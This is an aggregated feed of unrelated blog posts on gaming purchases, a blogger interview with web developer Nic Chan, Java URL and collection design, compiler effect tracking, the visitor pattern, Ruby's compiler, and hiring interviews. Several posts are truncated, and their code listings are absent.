time anyway. Remember Pizza Tower ? It’s out on Switch now. Remember to buy the cart on Fangamer, together with the Anton Blast one. It’s rumoured to cost more than . Save that money for a Switch 2 if the games are starting to become interesting to justify that upgrade, as currently, they’re not. Also, see the backlog point above. All HDMI ports both on the TV and your external monitors are occupied . Unless you’re willing to constantly switch cables, you’ll need to invest in a HDMI switch. Another . You can’t buy this without buying the Steam Controller. That’s easily another you already spent buying the Mobapad controller for your Switch as a replacement for the semi-broken Joy Cons. You can’t buy this as an expense on the company. You’re closing down the company, remember. (More on that later) The cool looking LED and programmable front display don’t justify an expensive purchase. After the initial excitement wears off, the LED will become annoying and you’ll simply turn it off.

0 views
Manuel Moreale 2 weeks ago

Nic Chan

This week on the People and Blogs series we have an interview with Nic Chan, whose blog can be found at nicchan.me . Tired of RSS? Read this in your browser or sign up for the newsletter . The People and Blogs series is supported by Numeric Citizen and the other 124 members of my "One a Month" club. If you enjoy P&B, consider becoming one for as little as 1 dollar a month. Hi, my name is Nic Chan! I'm a web developer and hobbyist artist who lives in Hong Kong. It's pretty funny, depending on who you ask, the audience is shocked to hear about my secret other life, since I typically keep these identities very separate. If I'm not tinkering with websites or frantically mixing paint, you might find me shitposting on Mastodon, sweating through the Hong Kong summers or volunteering at the cat shelter. Despite growing up on the internet, I had never intended to be a web developer. I studied Fine Arts at a small liberal arts college in California, where I solidified a vaguely Californian accent that haunts me till this day. I entered the working world hoping to start a career that would somehow be arts related, but quickly decided that it wasn't for me. The art world, especially at higher levels, feels very inauthentic and performative in a way that left me constantly tired. During that time, I managed to convince my employer that it would save them money if I also managed their website for them, and used that opportunity as a spring board to teach myself web development. Upon reflection, I have no idea how I managed to convince them that this was a good idea. Though some engagements were longer than others, I've been a freelance web developer for around 10 years now! I'm a web generalist, but the thing I want to do more of is building sustainable and accessible websites with core web technologies. This really is the reason I continue to do what I do! I love the web as a medium, and I want to see it thrive. The reason why I started posting on my blog was basically to prove to clients that I was a real, trustworthy person. Unfortunately, to have any sort of success as a freelancer, unless you are a literal savant, I think you need to do -some- kind of marketing, and blogging is the only method that I found acceptable to me personally. (LinkedIn was still a cesspit in 2015!) In recent years, the blog has very much drifted away from that original purpose. I now mostly post very long-form thoughts on tech industry topics, whenever I feel the need to. For some odd reason, my instructional/informative writing is not as popular as my ranting, so I will leave tech education to other folks! As far as my blog goes now, I probably spend an equal amount of time tinkering on random code parts of the site as writing blog posts. I want to explore more topics outside of web development and the tech industry in the future. My absolute favorite bloggers are the ones who 'bring their whole selves' to their blog, and post updates on their creative hobbies or whatever is on their mind at the moment. The thing I love about the IndieWeb is mostly the people behind it, so getting to bond over the little things like shared hobbies is one of the main draws for me. Fuck the technology, I'm here for the people. My blogging process is pretty simple. I might have an idea for a topic, and I'll create a file in Obsidian with as much information as I care to note down, and when I get a moment I will come back and write out the post, usually in a very linear way, in as many sittings as it takes to finish the draft. I switched to Obsidian sometime in 2025 and it really did help me get a lot more writing done than I did in years past — cloud-based SaaS solutions are fine, but apparently, if I have to log in to a website to start writing, that does pose a significant barrier to me actually getting any writing done. Having Obsidian just be there on my desktop removes that tiny bit of friction, and I had really underestimated how important that is to the creative process. Once a draft is done, I like to let things sit and marinate for a while, until I can read it again with 'fresh eyes.' You'll never find a super timely take on current events on my blog, I take far too long for that! I don't typically write additional drafts — call it a character flaw, but I'm far more likely to scrap an idea completely than to rework it in a substantial way. Shamefully, I have posts from over a year ago that are still about 90% complete. They will sit until I finally manage to push through whatever reservations I might have about posting and just hit the publish button. If I'm writing something more technical or industry-related, I will try badger some folks to do a quick read-through. Special shoutout to my buddy EJ Mason for being the person who usually suffers through this task. I have a pretty particular desk setup for ergonomic/health reasons. I am physically incapable of being a laptop in a coffee shop kind of person, my fingers will start to turn numb as I use the trackpad, and I've used a custom keyboard layout for so long I can't really get work done on a traditional keyboard layout! If I'm writing at my computer, I need to be in my home office, at my PC, with my Ergodox EZ (a split ortholinear keyboard that has served me very well over the past few years), and a drawing tablet as a pointer device. I like it to be nice and quiet when I'm writing, if there's background noise, I can't hear my internal voice over the sound of other people speaking! Even with this particular setup, sitting at my desk does tire me out more than most people, so on very rare occasions I will draft a post with pen and paper. Unlike with computer writing, I'm completely agnostic as to what materials I actually write with, I've occasionally written post outlines on stray receipts or napkins. I built my personal site with Astro and Svelte! I have a whole series on the topic of building my website if you want a peek behind the hood at how I did it. There's so much I want to do to extend the site, but I find the biggest obstacle remains creating the graphics. The funny thing is, I definitely feel a sense of dread when looking at a blank canvas, even when I know what the final product is going to look like. Maybe putting this out there in the world will be the kick in the butt I need to make progress! Everything is managed in code and Markdown, without a CMS. Though it does have flaws and limitations when it comes to certain components, Markdown remains my favorite format for drafting pretty much anything. My site is currently hosted on Cloudflare. I fully admit that it's not very IndieWeb of me, I do feel strongly about potentially moving off big tech infrastructure, but I'm not very good at managing servers on my own and I'm a bit scared to do so with the prevalence of bad-faith crawlers. Yeah, I wouldn't write the components in Svelte. If you look back at my posts, I acknowledge that I would probably regret this decision and want to use web components later, but at the time I lacked the web components knowledge to execute the vision properly. No shade against Svelte, it's just that for something like my blog, I prefer to have to deal with less of a maintenance burden than I might willingly take on for a work project, since I'm only in the codebase for a couple of times a year. There are some features/syntax that I'm using that will likely be deprecated in future versions of Svelte, so that's a pain I will have to deal with eventually. In my youth, I definitely had a bit of 'shiny new thing syndrome' when it came to web technologies. Nowadays, I prefer things that are more stable and slow. I've been burned just a few too many times for me to feel excited about proprietary technology! I pay for $24 USD for a domain name. I swear it used to be cheaper in the past! I also pay Plausible and Tinylytics as I believe in paying for privacy-respecting services. I started with Plausible, and at some point I became preoccupied with having a heart button for my posts, so I added Tinylytics. It's on my long list of todos to sort this out, I definitely don't need both. I mainly keep analytics to know where my posts are being linked from — doing this has helped me find some really awesome people and blogs (badum-tsh). Other than that, keeping the site running is free. This might change in the future, I do want to do more fun things that might require more financial resources, but I don't have any intent to monetize it, it's just a little home on the internet that I'm happy throw cash at to keep the (metaphorical) lights on. In no particularly order, here's a list of blogs I've been really enjoying. I think there will be some level of overlap with the People and Blogs folks, as I've been a long-time reader and found many folks worth following through this series, so thank you Manu! After rambling on for far too long for most of this, I'm finally at a loss for words. I'd be much obliged if you visited my site but you can also follow me on Mastodon if you have a hankering for some shelter cat pics. I have a submission coming out for the 'Free To Play' gaming-themed zine under Difference Engine , a Singaporean indie comics publisher. It's a collaboration with the narrative designer & writer Sarah Mak , I hope you'll check it out when the time comes! Now that you're done reading the interview, go check the blog and subscribe to the RSS feed . If you're looking for more content, go read one of the previous 115 interviews . Make sure to also say thank you to Luke Dorny and the other 124 supporters for making this series possible. Like Keenan , who I found from this series and is rapidly becoming one of my all-time favorite bloggers. Keenan is a true wordsmith, and an incredibly kind human. They're so good at what they do, that they managed to completely break some assumptions I had about myself, like I thought I hated the podcast format of 'two friends chatting' until they started one with Halsted ! Ethan Marcotte has been absolutely killing it lately. His work is quiet and thoughtful, but in a wonderfully understated way that sticks in your brain for a long, long time. I've never seen anyone write as much as Jim Nielsen does and still have as many awesome posts. Come on, what's your secret Jim? Melanie Richards is one of the main reasons I want to start blogging about my other creative hobbies a bit more. She also has one of the prettiest blog designs I have ever seen! Everything I know about web sustainability, I have probably learned directly from Fershad Irani's blog . Eric Bailey writes the kind of posts that I send to every single person I know in the industry as soon as I see them hit my feed. Robert Kingett 's website tagline is 'A fabulously blind romance author', what's not to love? Robert has written numerous pieces that have completely reshaped how I feel about certain topics. His writing style is persuasive with a heaped tablespoon of humor for good measure. The final two folks don't post that regularly, but they are my friends so I am allowed to nudge them in the hope it will make them post more often. Jan Maarten and Katherine Yang have blogs that are so unapologetically them. More posts, please!

0 views
Neil Madden 2 weeks ago

Were URLs a bad idea?

When I was writing Rating 26 years of Java changes , I started reflecting on the new HttpClient library in Java 11. The old way of fetching a URL was to use URL.openConnection() . This was intended to be a generic mechanism for retrieving the contents of any URL: files, web resources, FTP servers, etc. It was a pluggable mechanism that could, in theory, support any type of URL at all. This was the sort of thing that was considered a good idea back in the 90s/00s, but has a bunch of downsides: The new HttpClient in Java 11 is much better at doing HTTP, but it’s also specific to HTTP/HTTPS. And that seems like a good thing? In fact, in the vast majority of cases the uniformity of URLs is no longer a desirable aspect. Most apps and libraries are specialised to handle essentially a single type of URL, and are better off because of it. Are there still cases where it is genuinely useful to be able to accept a URL of any (or nearly any) scheme? Fetching different types of URLs can have wildly different security and performance implications, and wildly different failure cases. Do I really want to accept a mailto: URL or a javascript: “URL” ? No, never. The API was forced to be lowest-common-denominator, so if you wanted to set options that are specific to a particular protocol then you had to cast the return URLConnection to a more specific sub-class (and therefore lose generality).

0 views
Neil Madden 2 weeks ago

Monotonic Collections: a middle ground between immutable and fully mutable

This post covers several topics around collections (sets, lists, maps/dictionaries, queues, etc) that I’d like to see someone explore more fully. To my knowledge, there are many alternative collection libraries for Java and for many other languages, but I’m not aware of any that provide support for monotonic collections . What is a monotonic collection, I hear you ask? Well, I’m about to answer that. Jesus, give me a moment. It’s become popular, in the JVM ecosystem at least, for collections libraries to provide parallel class hierarchies for mutable and immutable collections: Set vs MutableSet, List vs MutableList, etc. I think this probably originated with Scala , and has been copied by Kotlin , and various alternative collection libraries, e.g. Eclipse Collections , Guava , etc. There are plenty of articles out there on the benefits and drawbacks of each type. But the gulf between fully immutable and fully mutable objects is enormous: they are polar opposites, with wildly different properties, performance profiles, and gotchas. I’m interested in exploring the space between these two extremes. (Actually, I’m interested in someone else exploring it, hence this post). One such point is the idea of monotonic collections, and I’ll now explain what that means. By monotonic I mean here logical monotonicity : the idea that any information that is entailed by some set of logical formulas is also entailed by any superset of those formulas. For a collection data structure, I would formulate that as follows: If any (non-negated) predicate is true of the collection at time t , then it is also true of the collection at any time t’ > t . For example, if c is a collection and c.contains(x) returns true at some point in time, then it must always return true from then onwards. To make this concrete, a MonotonicList (say) would have an append operation, but not insert , delete , or replace operations. More subtly, monotonic collections cannot have any aggregate operations: i.e., operations that report statistics/summary information on the collection as a whole. For example, you cannot have a size method, as the size will change as new items are added (and thus the predicate can become false). You can have (as I understand it) map and filter operations, but not a reduce / fold . So why are monotonic collections an important category to look at? Firstly, monotonic collections can have some of the same benefits as immutable data structures, such as simplified concurrency. Secondly, monotonic collections are interesting because they can be (relatively) easily made distributed, per the CALM principle: Consistency as Logical Monotonicity (insecure link, sorry). This says that monotonic collections are strongly eventually consistent without any need for coordination protocols. Providing such collections would thus somewhat simplify making distributed systems. Interestingly, Kotlin decided to make their mutable collection classes sub-types of the immutable ones: MutableList is a sub-type of List, etc. (They also decided to make the arrows go the other way from normal in their inheritance diagram, crazy kids). This makes sense in one way: mutable structures offer more operations than immutable ones. But it seems backwards from my point of view: it says that all mutable collections are immutable, which is logically false. (But then they don’t include the word Immutable in the super types). It also means that consumers of a List can’t actually assume it is immutable: it may change underneath them. Guava seems to make the opposite decision: ImmutableList extends the built-in (mutable) List type, probably for convenience. Both options seem to have drawbacks. I think the way to resolve this is to entirely separate the read-only view of a collection from the means to update it. On the view-side, we would have a class hierarchy consisting of ImmutableList, which inherits from MonotonicList, which inherits from the general List. On the mutation side, we’d have a ListAppender and ListUpdater classes, where the latter extends the former. Creating a mutable or monotonic list would return a pair of the read-only list view, and the mutator object, something like the following (pseudocode): The type hierarchies would look something like the following: This seems to satisfy allowing the natural sub-type relationships between types on both sides of the divide. It’s a sort of CQRS at the level of data structures, but it seems to solve the issue that the inheritance direction for read-only consumers is the inverse of the natural hierarchy for mutating producers. (This has a relationship to covariant/contravariant subtypes, but I’m buggered if I’m looking that stuff up again on my free time). Anyway, these thoughts are obviously pretty rough, but maybe some inklings of ideas if anyone is looking for an interesting project to work on.

0 views
Max Bernstein 2 weeks ago

A catalog of side effects

Optimizing compilers like to keep track of each IR instruction’s effects . An instruction’s effects vary wildly from having no effects at all, to writing a specific variable, to completely unknown (writing all state). This post can be thought of as a continuation of What I talk about when I talk about IRs , specifically the section talking about asking the right questions. When we talk about effects, we should ask the right questions: not what opcode is this? but instead what effects does this opcode have? Different compilers represent and track these effects differently. I’ve been thinking about how to represent these effects all year, so I have been doing some reading. In this post I will give some summaries of the landscape of approaches. Please feel free to suggest more. Internal IR effect tracking is similar to the programming language notion of algebraic effects in type systems, but internally, compilers keep track of finer-grained effects. Effects such as “writes to a local variable”, “writes to a list”, or “reads from the stack” indicate what instructions can be re-ordered, duplicated, or removed entirely. For example, consider the following pseodocode for some made-up language that stands in for a snippet of compiler IR: The goal of effects is to communicate to the compiler if, for example, these two IR instructions can be re-ordered. The second instruction might write to a location that the first one reads. But it also might not! This is about knowing if and alias —if they are different names that refer to the same object. We can sometimes answer that question directly, but often it’s cheaper to compute an approximate answer: could they even alias? It’s possible that and have different types, meaning that (as long as you have strict aliasing) the and operations that implement these reads and writes by definition touch different locations. And if they look at disjoint locations, there need not be any explicit order enforced. Different compilers keep track of this information differently. The null effect analysis gives up and says “every instruction is maximally effectful” and therefore “we can’t re-order or delete any instructions”. That’s probably fine for a first stab at a compiler, where you will get a big speed up purely based on strength reductions. Over-approximations of effects should always be valid. But at some point you start wanting to do dead code elimination (DCE), or common subexpression elimination (CSE), or loads/store elimination, or move instructions around, and you start wondering how to represent effects. That’s where I am right now. So here’s a catalog of different compilers I have looked at recently. There are two main ways I have seen to represent effects: bitsets and heap range lists. We’ll look at one example compiler for each, talk a bit about tradeoffs, then give a bunch of references to other major compilers. We’ll start with Cinder , a Python JIT, because that’s what I used to work on. Cinder tracks heap effects for its high-level IR (HIR) in instr_effects.h . Pretty much everything happens in the function, which is expected to know everything about what effects the given instruction might have. The data representation is a bitset representation of a lattice called an and that is defined in alias_class.h . Each bit in the bitset represents a distinct location in the heap: reads from and writes to each of these locations are guaranteed not to affect any of the other locations. Here is the X-macro that defines it: Note that each bit implicitly represents a set: does not refer to a specific list index, but the infinite set of all possible list indices. It’s any list index. Still, every list index is completely disjoint from, say, every entry in a global variable table. (And, to be clear, an object in a list might be the same as an object in a global variable table. The objects themselves can alias. But the thing being written to or read from, the thing being side effected , is the container.) Like other bitset lattices, it’s possible to union the sets by or-ing the bits. It’s possible to query for overlap by and-ing the bits. If this sounds familiar, it’s because (as the repo notes) it’s a similar idea to Cinder’s type lattice representation . Like other lattices, there is both a bottom element (no effects) and a top element (all possible effects): Union operations naturally hit a fixpoint at and intersection operations naturally hit a fixpoint at . All of this together lets the optimizer ask and answer questions such as: Let’s take a look at an (imaginary) IR version of the code snippet in the intro and see what analyzing it might look like in the optimizer. Here is the fake IR: You can imagine that declares that it reads from the heap and declares that it writes to the heap. Because tuple and list pointers cannot be casted into one another and therefore cannot alias, these are disjoint heaps in our bitset. Therefore , therefore these memory operations can never interfere! They can (for example) be re-ordered arbitrarily. In Cinder, these memory effects could in the future be used for instruction re-ordering, but they are today mostly used in two places: the refcount insertion pass and DCE. DCE involves first finding the set of instructions that need to be kept around because they are useful/important/have effects. So here is what the Cinder DCE looks like: There are some other checks in there but is right there at the core of it! Now that we have seen the bitset representation of effects and an implementation in Cinder, let’s take a look at a different representation and and an implementation in JavaScriptCore. I keep coming back to How I implement SSA form by Fil Pizlo , one of the significant contributors to JavaScriptCore (JSC). In particular, I keep coming back to the Uniform Effect Representation section. This notion of “abstract heaps” felt very… well, abstract. Somehow more abstract than the bitset representation. The pre-order and post-order integer pair as a way to represent nested heap effects just did not click. It didn’t make any sense until I actually went spelunking in JavaScriptCore and found one of several implementations—because, you know, JSC is six compilers in a trenchcoat [ citation needed ] . DFG, B3, DOMJIT, and probably others all have their own abstract heap implementations. We’ll look at DOMJIT mostly because it’s a smaller example and also illustrates something else that’s interesting: builtins. We’ll come back to builtins in a minute. Let’s take a lookat how DOMJIT structures its abstract heaps : a YAML file. It’s a hierarchy. is a subheap of is a subheap of… and so on. A write to any is a write to is a write to … Sibling heaps are unrelated: and , for example, are disjoint. To get a feel for this, I wired up a simplified version of ZJIT’s bitset generator (for types! ) to read a YAML document and generate a bitset. It generated the following Rust code: It’s not a fancy X-macro, but it’s a short and flexible Ruby script. Then I took the DOMJIT abstract heap generator —also funnily enough a short Ruby script—modified the output format slightly, and had it generate its int pairs: It already comes with a little diagram, which is super helpful for readability. Any empty range(s) represent empty heap effects: if the start and end are the same number, there are no effects. There is no one value, but any empty range could be normalized to . Maybe this was obvious to you, dear reader, but this pre-order/post-order thing is about nested ranges! Seeing the output of the generator laid out clearly like this made it make a lot more sense for me. What about checking overlap? Here is the implementation in JSC : (See also How to check for overlapping intervals and Range overlap in two compares for more fun.) While bitsets are a dense representation (you have to hold every bit), they are very compact and they are very precise. You can hold any number of combinations of 64 or 128 bits in a single register. The union and intersection operations are very cheap. With int ranges, it’s a little more complicated. An imprecise union of and can take the maximal range that covers both and . To get a more precise union, you have to keep track of both. In the worst case, if you want efficient arbitrary queries, you need to store your int ranges in an interval tree. So what gives? I asked Fil if both bitsets and int ranges answer the same question, why use int ranges? He said that it’s more flexible long-term: bitsets get expensive as soon as you need over 128 bits (you might need to heap allocate them!) whereas ranges have no such ceiling. But doesn’t holding sequences of ranges require heap allocation? Well, despite Fil writing this in his SSA post: The purpose of the effect representation baked into the IR is to provide a precise always-available baseline for alias information that is super easy to work with. […] you can have instructions report that they read/write multiple heaps […] you can have a utility function that produces such lists on demand. It’s important to note that this doesn’t actually involve any allocation of lists. JSC does this very clever thing where they have “functors” that they pass in as arguments that compress/summarize what they want to out of an instruction’s effects. Let’s take a look at how the DFG (for example) uses these heap ranges in analysis. The DFG is structured in such a way that it can make use of the DOMJIT heap ranges directly, which is neat. Note that in the example below is a thin wrapper over the DFG compiler’s own equivalent: is the function that calls these functors ( or in this case) for each effect that the given IR instruction declares. I’ve pulled some relevant snippets of , which is quite long, that I think are interesting. First, some instructions (constants, here) have no effects. There’s some utility in the call but I didn’t understand fully. Then there are some instructions that conditionally have effects depending on the use types of their operands. 1 Taking the absolute value of an Int32 or a Double is effect-free but otherwise looks like it can run arbitrary code. Some run-time IR guards that might cause side exits are annotated as such—they write to the heap. Local variable instructions read specific heaps indexed by what looks like the local index but I’m not sure. This means accessing two different locals won’t alias! Instructions that allocate can’t be re-ordered, it looks like; they both read and write the . This probably limits the amount of allocation sinking that can be done. Then there’s , which is the builtins stuff I was talking about. We’ll come back to that after the code block. (Remember that these operations are very similar to DOMJIT’s with a couple more details—and in some cases even contain DOMJIT s!) This node is the way for the DOM APIs in the browser—a significant chunk of the builtins, which are written in C++—to communicate what they do to the optimizing compiler. Without any annotations, the JIT has to assume that a call into C++ could do anything to the JIT state. Bummer! But because, for example, annotates what memory it reads from and what it doesn’t write to, the JIT can optimize around it better—or even remove the access completely. It means the JIT can reason about calls to known builtins the same way that it reasons about normal JIT opcodes. (Incidentally it looks like it doesn’t even make a C call, but instead is inlined as a little memory read snippet using a JIT builder API. Neat.) Last, we’ll look at Simple, which has a slightly different take on all of this. Simple is Cliff Click’s pet Sea of Nodes (SoN) project to try and showcase the idea to the world—outside of a HotSpot C2 context. This one is a little harder for me to understand but it looks like each translation unit has a that doles out different classes of memory nodes for each alias class. Each IR node then takes data dependencies on whatever effect nodes it might uses. Alias classes are split up based on the paper Type-Based Alias Analysis (PDF): “Our approach is a form of TBAA similar to the ‘FieldTypeDecl’ algorithm described in the paper.” The Simple project is structured into sequential implementation stages and alias classes come into the picture in Chapter 10 . Because I spent a while spelunking through other implementations to see how other projects did this, here is a list of the projects I looked at. Mostly, they use bitsets. HHVM , a JIT for the Hack language, also uses a bitset for its memory effects. See for example: alias-class.h and memory-effects.h . HHVM has a couple places that use this information, such as a definition-sinking pass , alias analysis , DCE , store elimination , refcount opts , and more. If you are wondering why the HHVM representation looks similar to the Cinder representation, it’s because some former HHVM engineers such as Brett Simmers also worked on Cinder! (note that I am linking an ART fork on GitHub as a reference, but the upstream code is hosted on googlesource ) Android’s ART Java runtime also uses a bitset for its effect representation. It’s a very compact class called in nodes.h . The side effects are used in loop-invariant code motion , global value numbering , write barrier elimination , scheduling , and more. CoreCLR mostly uses a bitset for its class. This one is interesting though because it also splits out effects specifically to include sets of local variables ( ). V8 is also about six completely different compilers in a trenchcoat. Turboshaft uses a struct in operations.h called which is two bitsets for reads/writes of effects. This is used in value numbering as well a bunch of other small optimization passes they call “reducers”. Maglev also has this thing called in their IR nodes that also looks like a bitset and is used in their various reducers. It has effect query methods on it such as and . Until recently, V8 also used Sea of Nodes as its IR representation, which also tracks side effects more explicitly in the structure of the IR itself. Guile Scheme looks like it has a custom tagging scheme type thing. Both bitsets and int ranges are perfectly cromulent ways of representing heap effects for your IR. The Sea of Nodes approach is also probably okay since it powers HotSpot C2 and (for a time) V8. Remember to ask the right questions of your IR when doing analysis. Thank you to Fil Pizlo for writing his initial GitHub Gist and sending me on this journey and thank you to Chris Gregory , Brett Simmers, and Ufuk Kayserilioglu for feedback on making some of the explanations more helpful. This is because the DFG compiler does this interesting thing where they track and guard the input types on use vs having types attached to the input’s own def . It might be a clean way to handle shapes inside the type system while also allowing the type+shape of an object to change over time (which it can do in many dynamic language runtimes).  ↩ where might this instruction write? (because CPython is reference counted and incref implies ownership) where does this instruction borrow its input from? do these two instructions’ write destinations overlap? This is because the DFG compiler does this interesting thing where they track and guard the input types on use vs having types attached to the input’s own def . It might be a clean way to handle shapes inside the type system while also allowing the type+shape of an object to change over time (which it can do in many dynamic language runtimes).  ↩

0 views
Neil Madden 3 weeks ago

Fluent Visitors: revisiting a classic design pattern

It’s been a while since I’ve written a pure programming post. I was recently implementing a specialist collection class that contained items of a number of different types. I needed to be able to iterate over the collection performing different actions depending on the specific type. There are lots of different ways to do this, depending on the school of programming you prefer. In this article, I’m going to take a look at a classic “Gang of Four” design pattern: The Visitor Pattern . I’ll describe how it works, provide some modern spins on it, and compare it to other ways of implementing the same functionality. Hopefully even the most die-hard anti-OO/patterns reader will come away thinking that there’s something worth knowing here after all. (Design Patterns? In this economy?) The example I’ll use in this post is a simple arithmetic expression language. It’s the kind of boring and not very realistic example you see all the time in textbooks, but the more realistic examples I have to hand have too many weird details, so this’ll do. I’m going to write everything in Java 25. Java because, after Smalltalk, it’s probably the language most associated with design patterns. And Java 25 specifically because it makes this example really nice to write. OK, our expression language just has floating-point numbers, addition, and multiplication. So we start by defining datatypes to represent these: If you’re familiar with a functional programming language, this is effectively the same as a datatype definition like the following: Now we want to define a bunch of different operations over these expressions: evaluation, pretty-printing, maybe type-checking or some other kinds of static analysis. We could just directly expose the Expression sub-classes and let each operation directly traverse the structure using pattern matching. For example, we can add an method directly to the expression class that evaluates the expression: (Incidentally, isn’t this great? It’s taken a long time, but I really like how clean this is in modern Java). We can then try out an example: Which gives us: There are some issues with this though. Firstly, there’s no encapsulation. If we want to change the way expressions are represented then we have to change eval() and any other function that’s been defined in this way. Secondly, although it’s straightforward for this small expression language, there can be a lot of duplication in operations over a complex structure dealing with details of traversing that structure. The Visitor Pattern solves both of these issues, as we’ll show now. The basic Visitor Pattern involves creating an interface with callback methods for each type of object you might encounter when traversing a structure. For our example, it looks like the following: A few things to note here: The next part of the pattern is to add an method to the Expression class, which then traverses the data structure invoking the callbacks as appropriate. In the traditional implementation, this method is implemented on each concrete sub-class using a technique known as “double-dispatch”. For example, we could add an implementation of to the Add class that calls . This technique is still sometimes useful, but I find it’s often clearer to just inline all that into the top-level Expression implementation (as a method implementation, because Expression is an interface): What’s going on here? Firstly, the method is parameterised to accept any type of return value. Again, we’ll see why in a moment. It then inspects the specific type of expression of this object and calls the appropriate callback on the visitor. Note that in the Add/Mul cases we also recursively visit the left-hand-side and right-hand-side expressions first, similarly to how we called .eval() on those in the earlier listing. We can then re-implement our expression evaluator in terms of the visitor: OK, that works. But it’s kinda ugly compared to what we had. Can we improve it? Yes, we can. The Visitor is really just a set of callback functions, one for each type of object in our data structure. Rather than defining these callbacks as an implementation of the interface, we could instead define them as three separate lambda functions. We can then invoke these instead: We can then use this to reimplement our expression evaluator again: That’s a lot nicer to look at. We can then call it as before, and we can also use the fluent visitor to define operations on the fly, such as printing a nicer string representation: There are some potential drawbacks to this approach, but overall I think it’s really clean and nice. One drawback is that you lose compile-time checking that all the cases have been handled: if you forget to register one of the callbacks you’ll get a runtime NullPointerException instead. There are ways around this, such as using multiple FluentVisitor types that incrementally construct the callbacks, but that’s more work: That ensures that every callback has to be provided before you can call , at the cost of needing many more classes. This is the sort of thing where good IDE support would really help (IntelliJ plugin anyone?). Another easy-to-fix nit is that, if you don’t care about the result, it is easy to forget to call and thus not actually do anything at all. This can be fixed by changing the method to accept a function rather than returning a FluentVisitor: The encapsulation that the Visitor provides allows us to quite radically change the underlying representation, while still preserving the same logical view of the data. For example, here is an alternative implementation that works only on positive integers and stores expressions in a compact reverse Polish notation (RPN). The exact same visitors we defined for the previous expression evaluator will also work for this one: Hopefully this article has shown you that there is still something interesting about old patterns like the Visitor, especially if you adapt them a bit to modern programming idioms. I often hear fans of functional programming stating that the Visitor pattern only exists to make up for the lack of pattern matching in OO languages like Java. In my opinion, this is the wrong way to think about things. Even when you have pattern matching (as Java now does) the Visitor pattern is still useful due to the increased encapsulation it provides, hiding details of the underlying representation. The correct way to think about the Visitor pattern is as a natural generalisation of the reduce/fold operation common in functional programming languages. Consider the following (imperative) implementation of a left-fold operation over a list: We can think of a linked list as a data structure with two constructors: Nil (the empty list), and Cons(List, List). In this case, the reduce operation is essentially a Visitor pattern where corresponds to the case and corresponds to the case. So, far from being a poor man’s pattern matching, the true essence of the Visitor is a generalised fold operation, which is why it’s so useful. Maybe this old dog still has some nice tricks, eh? We use a generic type parameter <T> to allow operations to return different types of results depending on what they do. We’ll see how this works in a bit. In keeping with the idea of encapsulating details, we use the more abstract type rather than the concrete type we’re using under the hood. (We could also have done this before, but I’m doing it here to illustrate that the Visitor interface doesn’t have to exactly represent the underlying data structures).

0 views
Pat Shaughnessy 3 weeks ago

Compiling a Call to a Block

I've started working on a new edition of Ruby Under a Microscope that covers Ruby 3.x. I'm working on this in my spare time, so it will take a while. Leave a comment or drop me a line and I'll email you when it's finished. This week's excerpt is from Chapter 2, about Ruby's compiler. Whenever I think about it, I'm always suprised that Ruby has a compiler like C, Java or any other programming language. The only difference is that we don't normally interact with Ruby's compiler directly. The developers who contributed Ruby's new parser, Prism, also had to rewrite the Ruby compiler because Prism now produces a completely different, redesigned abstract syntax tree (AST). Chapter 2's outline is more or less the same as it was in 2014, but I redrew all of the diagrams and updated much of the text to match the new AST nodes and other changes for Prism. Next, let’s compile my 10.times do example from Listing 1-1 in Chapter 1 (see Listing 2-2). Notice that this example contains a block parameter to the times method. This is interesting because it will give us a chance to see how the Ruby compiler handles blocks. Figure 2-13 shows the AST for the 10.times do example again. The left side of Figure 2-13 shows the AST for the 10.times function call: the call node and the receiver 10, represented by integer node. On the right, Figure 2-13 shows the beginning of the AST for the block: do |n| puts n end , represented by the block node. You can see Ruby has added a scope node on both sides, since there are two lexical scopes in Listing 2-2: the top level and the block. Let’s break down how Ruby compiles the main portion of the script shown on the left of Figure 2-13. As before, Ruby starts with the first PM_NODE_SCOPE and creates a new snippet of YARV instructions, as shown in Figure 2-14. Next, Ruby steps down the AST nodes to PM_CALL_NODE, as shown in Figure 2-15. At this point, there is still no code generated, but notice in Figure 2-13 that two arrows lead from PM_CALL_NODE : one to PM_INTEGER_NODE , which represents the 10 in the 10.times call, and another to the inner block. Ruby will first continue down the AST to the integer node and compile the 10.times method call. The resulting YARV code, following the same receiver-arguments-message pattern we saw in Figures 2-7 through 2-11, is shown in Figure 2-16. Notice that the new YARV instructions shown in Figure 2-16 push the receiver (the integer object 10) onto the stack first, after which Ruby generates an instruction to execute the times method call. But notice, too, the block in <main> argument in the send instruction. This indicates that the method call also contains a block argument: do |n| puts n end . In this example, the arrow from PM_CALL_NODE to the second PM_SCOPE_NODE has caused the Ruby compiler to include this block argument. Ruby continues by compiling the inner block, beginning with the second PM_CALL_NODE shown at right in Figure 2-13. Figure 2-17 shows what the AST for that inner block looks like. Notice Ruby inserted a scope node at the top of this branch of the AST also. Figure 2-17 shows the scope node contains two values: argc=1 and locals: [n] . These values were empty in the parent scope node, but Ruby set them here to indicate the presence of the block parameter n . From a relatively high level, Figure 2-18 shows how Ruby compiles the inner block. You can see the parent PM_NODE_SCOPE at the top, along with the YARV code from Figure 2-16. And below that Figure 2-18 shows the the inner scope node for the block, along with the YARV instructions for the block’s call to puts n . Later in this chapter we’ll learn how Ruby handles parameters and local variables, like n in this example; why Ruby generates these instructions for puts n . The key point for now is that Ruby compiles each distinct scope in your Ruby program—methods, blocks, classes, or modules, for example—into a separate snippet of YARV instructions.

0 views

Gatekeepers vs. Matchmakers

I estimate I’ve conducted well over 1,000 job interviews for developers and managers in my career. This has caused me to form opinions about what makes a good interview. I’ve spent the majority of it in fast-growing companies and, with the exception of occasional pauses here and there, we were always hiring. I’ve interviewed at every level from intern (marathon sessions at the University of Waterloo campus interviewing dozens of candidates over a couple of days) to VP and CTO level (my future bosses in some cases, my successor in roles I was departing in others). Probably the strongest opinion that I hold after all that is: adopting a Matchmaker approach builds much better teams than falling into Gatekeeper mode. Once the candidate has passed some sort of initial screen, either with a recruiter, the hiring manager, or both, most “primary” interviews are conducted with two to three employees interviewing the candidate—often the hiring manager and an individual contributor. (Of course, there are innumerable ways you can structure this, but that structure is what I’ve seen to be the most common.) Interviewers usually start with one of two postures when interviewing: the Gatekeeper or the Matchmaker : The former, the Gatekeeper , I would say is more common overall and certainly more common among individual contributors and people earlier in their career. It’s also a big driver of why a lot of interview processes include some sort of coding “test” meant to expose the fraudulent scammers pretending to be “real” programmers. All of that dates back to the early 2000s and the post-dotcom crash. Pre-crash, anyone with a pulse who could string together some HTML could get a “software developer” job, so there were a lot of people with limited experience and skills on the job market. Nowadays, aside from outright fraudsters (which are rare) I haven’t observed many wholly unqualified people getting past the résumé review or initial screen. If you let 